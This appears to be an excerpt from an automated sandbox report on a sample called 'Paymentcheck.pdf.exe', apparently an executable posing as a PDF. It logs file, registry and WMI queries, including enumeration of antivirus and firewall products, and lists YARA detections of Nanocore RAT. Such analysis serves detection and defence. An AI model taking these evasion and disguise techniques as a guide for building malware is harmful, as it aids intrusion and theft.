Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06A20DB0 GetSystemTimes,
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
